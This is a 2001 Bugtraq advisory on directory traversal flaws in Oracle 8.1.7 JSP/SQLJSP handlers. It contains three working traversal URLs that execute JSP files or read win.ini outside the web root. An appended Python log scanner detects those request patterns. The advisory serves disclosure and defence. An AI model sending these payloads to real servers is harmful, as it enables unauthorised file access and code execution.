Bugtraq mailing list archives
Oracle JSP/SQLJSP handlers allow viewing files and executing JSP outside the web root
From: Georgi Guninski <guninski () GUNINSKI COM>
Date: Mon, 22 Jan 2001 17:35:55 +0200
Georgi Guninski security advisory #36, 2001

Oracle JSP/SQLJSP handlers allow viewing files and executing JSP outside the web root

Systems affected:
Oracle JSP/SQLJSP handlers, installed by default
Oracle 8.1.7 Windows 2000
Have not tested on other versions but they may be vulnerable

Risk: High
Date: 22 January 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski bears no responsibility for content or misuse of this advisory or program or any derivatives thereof.

Description:
It is possible to view files outside the web root. Also possible is execution of .JSP files outside the web root in the same partition as the web server's root.

Details:
I guess there are at least 2 vulnerabilities with JSP/SQLJSP handlers. Basically these are directory traversal vulnerabilities.

1) The following URL:
---------------------------------------
http://oraclehost/servlet//..//../o.jsp
---------------------------------------
will execute c:\o.jsp if there is such a file.
As a side effect this shall create the directory C:\servlet\_pages\_servlet and shall put in it the java source and .class file of o.jsp

2) The following URL:
-------------------------------------------------------------
http://oraclehost/a.jsp//..//..//..//..//..//../winnt/win.ini
-------------------------------------------------------------
shall read c:\winnt\win.ini.
It is normal to receive an error to this request.
To see the result go to: http://oraclehost/_pages and look in the directories for .java files containing "win"

3) The following URL:
-----------------------------------------------------------------
http://oraclehost/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
-----------------------------------------------------------------
shall read c:\winnt\win.ini.
It is normal to receive an error to this request.
To see the result go to: http://oraclehost/_pages and look in the directories for .java files containing "win"

Note: all urls were tested with Netscape 4.76 or direct HTTP requests. Do not work with IE.

Vendor status:
Oracle was contacted on 18 January 2001.

Regards,
Georgi Guninski
http://www.guninski.com
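For administrators reviewing access logs for the request shapes listed in the advisory above, the following is an added example and not part of the original post. It assumes Common Log Format lines; the names `classify` and `scan`, the sample log lines and the choice to collapse empty path segments the way a file system would are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Handler markers taken from the advisory's URLs: /servlet/, *.jsp, *.sqljsp
HANDLER = re.compile(r"(?i)^servlet$|\.(?:jsp|sqljsp)$")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (documentation-range client addresses)
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jan/2001:17:40:01 +0200] "GET /index.jsp HTTP/1.0" 200 512',
    '192.0.2.77 - - [22/Jan/2001:17:41:10 +0200] "GET /servlet//..//../o.jsp HTTP/1.0" 200 128',
    '192.0.2.77 - - [22/Jan/2001:17:41:30 +0200] "GET /a.jsp//..//..//..//..//..//../winnt/win.ini HTTP/1.0" 500 0',
    '192.0.2.77 - - [22/Jan/2001:17:41:45 +0200] "GET /bb.sqljsp//..//..//..//..//..//../winnt/win.ini HTTP/1.0" 500 0',
    '192.0.2.77 - - [22/Jan/2001:17:42:05 +0200] "GET /_pages/ HTTP/1.0" 200 2048',
    '192.0.2.10 - - [22/Jan/2001:17:43:00 +0200] "GET /app/../index.jsp HTTP/1.0" 200 512',
]

def classify(target):
    """Return a finding label for one request target, or None if it looks benign."""
    # Drop the query string, decode %2e-style escapes, treat backslash as a separator.
    path = unquote(target.split("?", 1)[0]).replace("\\", "/")
    segments = path.split("/")[1:]
    depth, seen_handler = 0, False
    for seg in segments:
        if seg == "..":
            depth -= 1
            if depth < 0:  # resolved path has climbed above the web root
                return "escape-after-handler" if seen_handler else "escape"
        elif seg not in ("", "."):  # empty segments (from "//") add no depth
            depth += 1
            seen_handler = seen_handler or bool(HANDLER.search(seg))
    # The advisory says the translated .java output appears under /_pages
    if segments and segments[0].lower() == "_pages":
        return "pages-browse"
    return None

def scan(lines):
    """Return (client, target, finding) for every suspicious log line."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if m and (finding := classify(m.group(1))):
            findings.append((line.split()[0], m.group(1), finding))
    return findings

if __name__ == "__main__":
    for client, target, finding in scan(SAMPLE_LOG):
        print(f"{finding:22} {client:12} {target}")
```

A request that stays inside the web root after resolution, such as `/app/../index.jsp`, is not reported; only paths whose `..` segments outnumber the real directories before them are.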